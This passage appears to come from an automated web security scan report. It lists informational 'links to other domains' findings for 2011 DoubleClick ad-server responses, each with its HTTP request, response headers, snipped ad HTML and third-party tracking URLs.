GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:27:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.9. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3740.MSN/B5123509.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?

The response contains the following links to other domains:

http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=6553387
http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5877
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/d%3B234278507%3B4-0%3B0%3B58143061%3B4307-300/250%3B40142779/40160566/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.universityoffarmers.com"><img src="http://s0.2mdn.net/2426847/1-Branding_Film_300x250_V2.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
<SCRIPT SRC="http://amch.questionmarket.com/adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=6553387" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

22.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=5982434&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:29:44 GMT
Expires: Sun, 30 Jan 2011 01:29:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
82434&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=5982434&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

22.11. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
53387&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=6553387&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

22.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349
http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=4564506&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5219
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:24:45 GMT
Expires: Sun, 30 Jan 2011 17:24:45 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
64506&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401349&migRandom=4564506&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401349"></script>
...[SNIP]...

22.13. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlant_4k_300x60.gif
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/y;232242619;8-0;0;56133728;91-300/60;40295863/40313650/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlant

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 695

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/y;232242619;8-0;0;56133728;91-300/60;40295863/40313650/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlant"><img src="http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlant_4k_300x60.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.14. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?

The response contains the following links to other domains:

http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlantBevel_6k_300x60.gif
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/x;232242619;11-0;0;56133728;91-300/60;40295866/40313653/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlantBevel

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 706
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:48:16 GMT
Expires: Sun, 30 Jan 2011 14:48:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/bf/%2a/x;232242619;11-0;0;56133728;91-300/60;40295866/40313653/1;;~sscs=%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PC_598MSNblooSlantBevel"><img src="http://s0.2mdn.net/viewad/1150992/000_598MSNblooSlantBevel_6k_300x60.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.15. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3973.MSN/B4412732.159

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?

The response contains the following links to other domains:

http://s0.2mdn.net/1150992/drt_300x60_americanGirl_fs_v2_19.3k.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/c%3B232242619%3B5-0%3B0%3B56133728%3B91-300/60%3B39947599/39965386/1%3B%3B%7Esscs%3D%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PartnerCenter_AmerGirl

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6382
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:26:18 GMT
Expires: Sun, 30 Jan 2011 19:26:18 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/bf/%2a/c%3B232242619%3B5-0%3B0%3B56133728%3B91-300/60%3B39947599/39965386/1%3B%3B%7Esscs%3D%3fhttp://www.freecreditscore.com/dni/default.aspx?SiteVersionID=932&sc=671037&bcd=MSN_INVPC4_PartnerCenter_AmerGirl"><img src="http://s0.2mdn.net/1150992/drt_300x60_americanGirl_fs_v2_19.3k.jpg" width="300" height="60" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

22.16. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=146794379?click=http://clk.atdmt.com/goiframe/198094467.198102269/148848786/direct/01%3fhref=

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=146794379?click=http://clk.atdmt.com/goiframe/198094467.198102269/148848786/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/148848786/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:30:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/4d/%2a/n
...[SNIP]...
-728/90;40019815/40037602/2;;~sscs=%3fhttp://clk.redcated/goiframe/198094467.198102269/148848786/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

22.17. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.383

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1323822/Womens_Rollback_728x90.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4826
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:39:15 GMT
Expires: Sun, 30 Jan 2011 01:39:15 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0071844/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref=http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/Womens_Rollback_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

